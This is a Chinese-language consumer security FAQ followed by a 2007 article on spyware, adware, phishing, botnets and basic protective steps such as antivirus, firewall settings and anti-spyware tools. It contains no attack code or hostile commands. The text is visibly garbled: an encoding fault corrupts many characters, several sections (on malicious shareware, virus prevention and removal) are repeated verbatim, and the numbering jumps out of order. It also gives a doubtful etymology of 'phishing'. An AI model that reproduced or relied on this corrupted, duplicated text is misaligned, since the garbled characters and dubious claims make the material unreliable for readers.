惡意共享軟件(malicious shareware)是指采用不正當?shù)睦壔虿煌该鞯姆绞綇娭瓢惭b在用戶的計算機上,并且利用一些病毒常用的技術(shù)手段造成軟件很難被卸載,或采用一些非法手段強制用戶購買的免費、共享軟件。 安裝共享軟件時,應(yīng)注意以下方面: 注意仔 細閱讀軟件提供的“安裝協(xié)議”,不要隨便點“next”進行安裝。
不要安裝從不良渠道獲得的盜版軟件,這些軟件往往由于破解不完全,安裝之后帶來安全風險。
使用具有破壞性功能的軟件,如硬盤整理、分區(qū)軟件等,一定要仔細了解它的功能之后再使用,避免因誤操作產(chǎn)生不可挽回的損失。
第十六:如何更好地預防計算機病毒入侵
有病治病,無病預防這是人們對健康生活的最基本也是最重要的要求,預防比治療更為重要。對計算機來說,同樣也是如此,了解病毒,針對病毒養(yǎng)成一個良好的計算機應(yīng)用管理習慣,對保障您的計算機不受計算機病毒侵擾是尤為重要的。為了減少病毒的侵擾,建議大家平時能做到“三打三防”。
“三打” 就是安裝新的計算機系統(tǒng)時,要注意打系統(tǒng)補丁,震蕩波一類的惡性蠕蟲病毒一般都是通過系統(tǒng)漏洞傳播的,打好補丁就可以防止此類病毒感染;用戶上網(wǎng)的時候要打開殺毒軟件實時監(jiān)控,以免病毒通過網(wǎng)絡(luò)進入自己的電腦;玩網(wǎng)絡(luò)游戲時要打開個人防火墻,防火墻可以隔絕病毒跟外界的聯(lián)系,防止木馬病毒盜竊資料。
“三防” 就是防郵件病毒,用戶收到郵件時首先要進行病毒掃描,不要隨意打開電子郵件里攜帶的附件;防木馬病毒,木馬病毒一般是通過惡意網(wǎng)站散播,用戶從網(wǎng)上下載任何文件后,一定要先進行病毒掃描再運行;防惡意“好友”,現(xiàn)在很多木馬病毒可以通過 MSN、 QQ等即時通信軟件或電子郵件傳播,一旦你的在線好友感染病毒,那么所有好友將會遭到病毒的入侵。
第十七:如何干凈地清除病毒
1、在安全模式或純DOS模式下清除病毒
當計算機感染病毒的時候,絕大多數(shù)的感染病毒的處理可以在正常模式下徹底清除病毒,這里說的正常模式準確的說法應(yīng)該是實模式(Real Mode),這里通俗點說了。其包括正常模式的 Windows 和正常模式的 Windows 下的“MS-DOS 方式” 或 " 命令提示符”。但有些病毒由于使用了更加隱匿和狡猾的手段往往會對殺毒軟件進行攻擊甚至是刪除系統(tǒng)中的殺毒軟件的做法,針對這樣的病毒絕大多數(shù)的殺毒軟件都被設(shè)計為在安全模式可安裝、使用、執(zhí)行殺毒處理。
在安全模式(Safe Mode)或者純DOS下進行清除清除時,對于現(xiàn)在大多數(shù)流行的病毒,如蠕蟲病毒、木馬程序和網(wǎng)頁代碼病毒等,都可以在安全模示下清除。DOS下殺毒(建議用干凈軟盤啟動殺毒)。而且,當計算機原來就感染了病毒,那就更需要在安裝反病毒軟件后(升級到最新的病毒庫),在安全模式(Safe Mode)或者純DOS下清除一遍病毒了!
第十三:什么是網(wǎng)絡(luò)釣魚
什么是網(wǎng)絡(luò)釣魚?
網(wǎng)絡(luò)釣魚 (Phishing)攻擊者利用欺騙性的電子郵件和偽造的 Web 站點來進行網(wǎng)絡(luò)詐騙活動,受騙者往往會泄露自己的私人資料,如信用卡號、銀行卡賬戶、身份證號等內(nèi)容。詐騙者通常會將自己偽裝成網(wǎng)絡(luò)銀行、在線零售商和信用卡公司等可信的品牌,騙取用戶的私人信息。
如何防備網(wǎng)絡(luò)釣魚?
不要在網(wǎng)上留下可以證明自己身份的任何資料,包括手機號碼、身份證號、銀行卡號碼等。
不要把自己的隱私資料通過網(wǎng)絡(luò)傳輸,包括銀行卡號碼、身份證號、電子商務(wù)網(wǎng)站賬戶等資料不要通過QQ 、MSN 、Email 等軟件傳播,這些途徑往往可能被黑客利用來進行詐騙。
不要相信網(wǎng)上流傳的消息,除非得到權(quán)威途徑的證明。如網(wǎng)絡(luò)論壇、新聞組、 QQ 等往往有人發(fā)布謠言,伺機竊取用戶的身份資料等。
不要在網(wǎng)站注冊時透露自己的真實資料。例如住址、住宅電話、手機號碼、自己使用的銀行賬戶、自己經(jīng)常去的消費場所等。騙子們可能利用這些資料去欺騙你的朋友。
如果涉及到金錢交易、商業(yè)合同、工作安排等重大事項,不要僅僅通過網(wǎng)絡(luò)完成,有心計的騙子們可能通過這些途徑了解用戶的資料,伺機進行詐騙。
不要輕易相信通過電子郵件、網(wǎng)絡(luò)論壇等發(fā)布的中獎信息、促銷信息等,除非得到另外途徑的證明。正規(guī)公司一般不會通過電子郵件給用戶發(fā)送中獎信息和促銷信息,而騙子們往往喜歡這樣進行詐騙。
第十四:什么是瀏覽器劫持
瀏覽器劫持是一種惡意程序,通過DLL插件、BHO 、Winsock LSP 等形式 對用戶的瀏覽器進行篡改,使用戶瀏覽器出現(xiàn) 訪問正常網(wǎng)站時被轉(zhuǎn)向到惡意網(wǎng)頁、IE瀏覽器主頁 / 搜索頁等被修改為劫持軟件指定的網(wǎng)站地址等異常。
瀏覽器劫持如何防止,被劫持之后應(yīng)采取什么措施?
瀏覽器劫持分為多種不同的方式,從最簡單的修改IE默認搜索頁到最復雜的通過病毒修改系統(tǒng)設(shè)置并設(shè)置病毒守護進程,劫持瀏覽器,都有人采用。針對這些情況,用戶應(yīng)該采取如下措施:
不要輕易瀏覽不良網(wǎng)站。
不要輕易安裝共享軟件、盜版軟件。
建議使用安全性能比較高的瀏覽器,并可以針對自己的需要對瀏覽器的安全設(shè)置進行相應(yīng)調(diào)整。
如果給瀏覽器安裝插件,盡量從瀏覽器提供商的官方網(wǎng)站下載。
第十五:什么是惡意共享軟件
惡意共享軟件(malicious shareware)是指采用不正當?shù)睦壔虿煌该鞯姆绞綇娭瓢惭b在用戶的計算機上,并且利用一些病毒常用的技術(shù)手段造成軟件很難被卸載,或采用一些非法手段強制用戶購買的免費、共享軟件。 安裝共享軟件時,應(yīng)注意以下方面: 注意仔 細閱讀軟件提供的“安裝協(xié)議”,不要隨便點“next”進行安裝。
不要安裝從不良渠道獲得的盜版軟件,這些軟件往往由于破解不完全,安裝之后帶來安全風險。
使用具有破壞性功能的軟件,如硬盤整理、分區(qū)軟件等,一定要仔細了解它的功能之后再使用,避免因誤操作產(chǎn)生不可挽回的損失。
第十六:如何更好地預防計算機病毒入侵
有病治病,無病預防這是人們對健康生活的最基本也是最重要的要求,預防比治療更為重要。對計算機來說,同樣也是如此,了解病毒,針對病毒養(yǎng)成一個良好的計算機應(yīng)用管理習慣,對保障您的計算機不受計算機病毒侵擾是尤為重要的。為了減少病毒的侵擾,建議大家平時能做到“三打三防”。
“三打” 就是安裝新的計算機系統(tǒng)時,要注意打系統(tǒng)補丁,震蕩波一類的惡性蠕蟲病毒一般都是通過系統(tǒng)漏洞傳播的,打好補丁就可以防止此類病毒感染;用戶上網(wǎng)的時候要打開殺毒軟件實時監(jiān)控,以免病毒通過網(wǎng)絡(luò)進入自己的電腦;玩網(wǎng)絡(luò)游戲時要打開個人防火墻,防火墻可以隔絕病毒跟外界的聯(lián)系,防止木馬病毒盜竊資料。
“三防” 就是防郵件病毒,用戶收到郵件時首先要進行病毒掃描,不要隨意打開電子郵件里攜帶的附件;防木馬病毒,木馬病毒一般是通過惡意網(wǎng)站散播,用戶從網(wǎng)上下載任何文件后,一定要先進行病毒掃描再運行;防惡意“好友”,現(xiàn)在很多木馬病毒可以通過 MSN、 QQ等即時通信軟件或電子郵件傳播,一旦你的在線好友感染病毒,那么所有好友將會遭到病毒的入侵。
第十七:如何干凈地清除病毒
1、在安全模式或純DOS模式下清除病毒
當計算機感染病毒的時候,絕大多數(shù)的感染病毒的處理可以在正常模式下徹底清除病毒,這里說的正常模式準確的說法應(yīng)該是實模式(Real Mode),這里通俗點說了。其包括正常模式的 Windows 和正常模式的 Windows 下的“MS-DOS 方式” 或 " 命令提示符”。但有些病毒由于使用了更加隱匿和狡猾的手段往往會對殺毒軟件進行攻擊甚至是刪除系統(tǒng)中的殺毒軟件的做法,針對這樣的病毒絕大多數(shù)的殺毒軟件都被設(shè)計為在安全模式可安裝、使用、執(zhí)行殺毒處理。
在安全模式(Safe Mode)或者純DOS下進行清除清除時,對于現(xiàn)在大多數(shù)流行的病毒,如蠕蟲病毒、木馬程序和網(wǎng)頁代碼病毒等,都可以在安全模示下清除。DOS下殺毒(建議用干凈軟盤啟動殺毒)。而且,當計算機原來就感染了病毒,那就更需要在安裝反病毒軟件后(升級到最新的病毒庫),在安全模式(Safe Mode)或者純DOS下清除一遍病毒了!
只防病毒并不安全 安全攻略全解
[ 2007-03-25 03:48:14 | 作者: sun ]
上網(wǎng)的人中,很少有誰沒被病毒侵害過。但在大多數(shù)人將注意力放在對付病毒上時,業(yè)內(nèi)權(quán)威人士新近指出,現(xiàn)在要想保證上網(wǎng)安全,必須對以下這三種威脅同時設(shè)防。第一是以傳統(tǒng)宏病毒、蠕蟲等為代表的入侵性病毒;第二是以間諜軟件、廣告軟件、網(wǎng)絡(luò)釣魚軟件、木馬程序為代表的擴展類威脅;第三是以黑客為首的有目標的專門攻擊或無目標的隨意攻擊為代表的網(wǎng)絡(luò)侵害。
三大新威脅
Spyware(間諜軟件):主要是用作偷取用戶個人資料的惡意程序,如用戶使用網(wǎng)上銀行、網(wǎng)上購物等電子商務(wù)應(yīng)用時,如果沒有相關(guān)的防御措施與意識,那么用戶的網(wǎng)銀賬號和密碼就很容易被竊取。
Adware(廣告軟件):是一種軟件,一般表現(xiàn)為用戶點擊網(wǎng)站后就一連出現(xiàn)好多疊加著的網(wǎng)頁,非常不好關(guān)。它通常都跟某些工具軟件綁在一起,當你安裝這些軟件后,也就跟著進入你的電腦了。它不但占用系統(tǒng)資源,還常常連著一些色情網(wǎng)站。除強行向用戶做廣告外,更會刺探用戶的個人隱私資料,例如姓名、郵箱、銀行資料、電話、地址等,因此隱藏著不小的危害性,需要盡快清除。
Phishing(網(wǎng)絡(luò)釣魚軟件,又稱電子黑餌):是fishing和phone的縮寫。是指盜取他人個人資料、銀行及財務(wù)賬戶資料的網(wǎng)絡(luò)相關(guān)誘騙行為,可分為誘騙式及技術(shù)式兩種。誘騙式是利用特制的電郵,引導收件人連接到特制的網(wǎng)頁,這些網(wǎng)頁通常會偽裝成真正的銀行或理財網(wǎng)頁,令登錄者信以為真,輸入信用卡或銀行卡號碼、賬戶名稱及密碼等;技術(shù)性的Phishing則是將程序安裝到受害者的電腦中,直接盜取個人資料或使用木馬程序、按鍵記錄程序等。
只防病毒不安全
信息產(chǎn)業(yè)部發(fā)布的最新統(tǒng)計數(shù)據(jù)顯示,目前中國互聯(lián)網(wǎng)上網(wǎng)人數(shù)已達9880萬。目前眾多網(wǎng)民已不再是簡單地上網(wǎng)瀏覽網(wǎng)頁及收發(fā)電郵,隨著網(wǎng)上銀行、網(wǎng)上購物等電子商務(wù)應(yīng)用的出現(xiàn),來自網(wǎng)上的威脅不僅僅是傳統(tǒng)的病毒了。
有報道稱,中國目前已經(jīng)成黑客首選的攻擊目標,每天有3萬臺PC機處于隨時可能被攻擊的失控狀態(tài)。業(yè)內(nèi)人士指出,未來對電腦及電腦用戶造成最大威脅的并不是我們慣常認為的電腦病毒(Virus),而是一些Spyware(間諜軟件)、Adware(廣告軟件)、Phishing(網(wǎng)絡(luò)釣魚軟件)、Trojan(木馬程序)、Worms(蠕蟲)。原因是大部分用戶及商業(yè)機構(gòu)對一般的電腦病毒已有一定的防范,譬如安裝防毒程序等,再新的病毒也能在短時間內(nèi)被解決,可是對于Spyware、Trojan及Worms絕大多數(shù)網(wǎng)民防范意識較為薄弱。雖然一般的電腦上也安裝了防毒程序,但實際上單一的防毒程序并不能阻擋來自網(wǎng)上的侵襲。數(shù)碼周刊在此向大家介紹如何架構(gòu)一個縝密的“三防”電腦防御系統(tǒng),以保證上網(wǎng)安全。
害人四大新趨勢
Symantec中國區(qū)技術(shù)總監(jiān)Robert在接受記者采訪時表示,總體來說,以前的黑客攻擊和犯罪的目的性不很明確,他們大多出于好奇、出風頭的目的。而現(xiàn)在多是有組織、有目的的經(jīng)濟犯罪。據(jù)我們分析,黑客的攻擊大致有如下四大趨勢:
1.盜取個人資料
近年來利用Phishing攻擊的犯罪增長非常快,主要出現(xiàn)在電子商務(wù)應(yīng)用中。黑客假借銀行之名給銀行用戶發(fā)電子郵件,提示銀行系統(tǒng)升級要求用戶重新注冊,用戶一旦輕信進行注冊,銀行賬號即落入黑客掌中,與此伴隨的將是你的銀行存款不翼而飛。
2.“僵尸”入侵
據(jù)Symantec今年3月份公布的安全報告顯示,去年7月—12月,從全球來看,僵尸即機器人(BOT)程序在中國的增長最快,而整個亞太區(qū)也居于全球前十名。BOT類似于木馬程序,它執(zhí)行的是預先沒有設(shè)置好的程序,通過所有被程序控制的“僵尸”電腦一同對某一目標發(fā)起攻擊。這種攻擊的危險性最大,因為它不像病毒可以提前監(jiān)控。
3.Adware、Spyware偷襲
Symantec的技術(shù)中心曾在用戶送修的筆記本電腦中發(fā)現(xiàn),其已經(jīng)被植入了多達近百種的Adware或Spyware軟件。它們一般通過小的用戶在下載Flash和小游戲時安裝,由于它們不像病毒和蠕蟲那么敏感,于是得以在不知不覺中入侵你的電腦。現(xiàn)在一些正規(guī)的軟件廠商也在應(yīng)用這些軟件來搜集用戶的資料。盡管目前這類軟件不見得都有害,但它們搜集的畢竟是你的個人隱私信息。這也將成為未來防范的重點。
4.垃圾郵件改頭換面
從當前來看,垃圾郵件的總量雖然呈下降態(tài)勢,但其逃避技術(shù)卻越來越強。這類郵件中攜帶著大量的病毒、Phishing、蠕蟲、木馬及額外的風險。
三防靠六招
人們常常認為,只要安裝一些單純的網(wǎng)絡(luò)防御產(chǎn)品就等于構(gòu)建了一個完備的電腦防御系統(tǒng)。殊不知,這些還不足以構(gòu)建起一個完善的網(wǎng)絡(luò)整體防御體系,還需要在網(wǎng)絡(luò)安全管理標準的指導下,通過網(wǎng)絡(luò)安全管理整體解決方案,結(jié)合各種不同的網(wǎng)絡(luò)防御技術(shù)和產(chǎn)品,在整體上維護網(wǎng)絡(luò)和信息系統(tǒng)的安全。
1.基本防(殺)毒軟件不可少
對于一般用戶而言,首先要做的就是為電腦安裝一套殺毒軟件。只要是正規(guī)廠商的正版殺毒軟件,任選一套即可。安裝的步驟很簡單,只要將安裝盤放入光驅(qū),按照系統(tǒng)的自動安裝界面的提示選擇安裝**殺毒軟件→選擇安裝的語言版本→再一路NEXT即可。
2.個人防火墻設(shè)定是關(guān)鍵
在上述防病毒軟件中都含有個人防火墻,所以可用同一張光盤運行個人防火墻安裝,重點提示防火墻在安裝后一定要根據(jù)需求進行詳細配置。
各種防火墻的設(shè)置技巧有一定的共通之處,那就是在選擇將目前上網(wǎng)中的“區(qū)域連線 ”→“設(shè)定值”的“服務(wù)”中的大部分連接協(xié)議剔除,只保留基本的HTTP、HTTPS、SMTP、POP3項目能夠通過防火墻,按下確定后你的電腦就能防范大部分的蠕蟲入侵了。
3.斬斷Phishing魚鉤
反網(wǎng)絡(luò)釣魚組織APWG(Anti-PhishingWorkingGroup)最新統(tǒng)計指出,約有70.8%的網(wǎng)絡(luò)欺詐是針對金融機構(gòu)而來。從國內(nèi)前幾年的情況看大多Phishing只是被用來騙取QQ密碼與游戲點卡與裝備,但今年國內(nèi)的眾多銀行已經(jīng)多次被Phishing過了。可以下載一些工具來防范Phishing活動。
4.反間諜、廣告軟件必殺
要防范Spyware的話,除了需要在電腦上安裝有如防毒程序的反間程序,時常監(jiān)察及清除電腦的Spyware外。還要對將要在計算機上安裝的共享軟件進行甄別選擇,尤其是那些你并不熟悉的,可以登錄其官方網(wǎng)站了解詳情。此外,在安裝共享軟件時,不要總是心不在焉地一路單擊“OK”按鈕,而應(yīng)仔細閱讀各個步驟出現(xiàn)的協(xié)議條款,特別留意那些有關(guān)Spyware行為的語句。
Adware和其他惡意程序相近,它們中簡單的會出現(xiàn)在控制面板的添加或刪除程序里,用戶可直接把它們移除。不過大部分Adware為了掩人耳目都不會直接顯示程序本體,要刪除它們就需要利用一些針對性的軟件。
5.自建網(wǎng)站黑名單
清除了廣告程序后,并不代表已存在瀏覽器內(nèi)的問題會自動被還原,還需要用戶手動重新更改標題及首頁。雖然《SpybotSearch&Destory》也有相近的功能,但使用起來卻沒有一款叫《SpywareBlaster》的軟件方便。通過該軟件用戶可以先對有問題的網(wǎng)站做出預防,限制他們對電腦安裝程序,并能清除目前已經(jīng)安裝的有害ActiveX控件。建議與上述軟件同時安裝。另外,用戶若要防備有問題的網(wǎng)站對電腦安裝不明軟件,同樣可使用《SpywareBlaster》來解決。
6.訓練軟件認垃圾
相信擁有電子郵箱的用戶都受到過不同程度的垃圾郵件(SPAM)騷擾,令人不勝其煩,特別是每每長假過后郵箱被塞爆之虞。為此,用戶要做的就是安裝一款電郵過濾程序,把SPAM過濾掉。
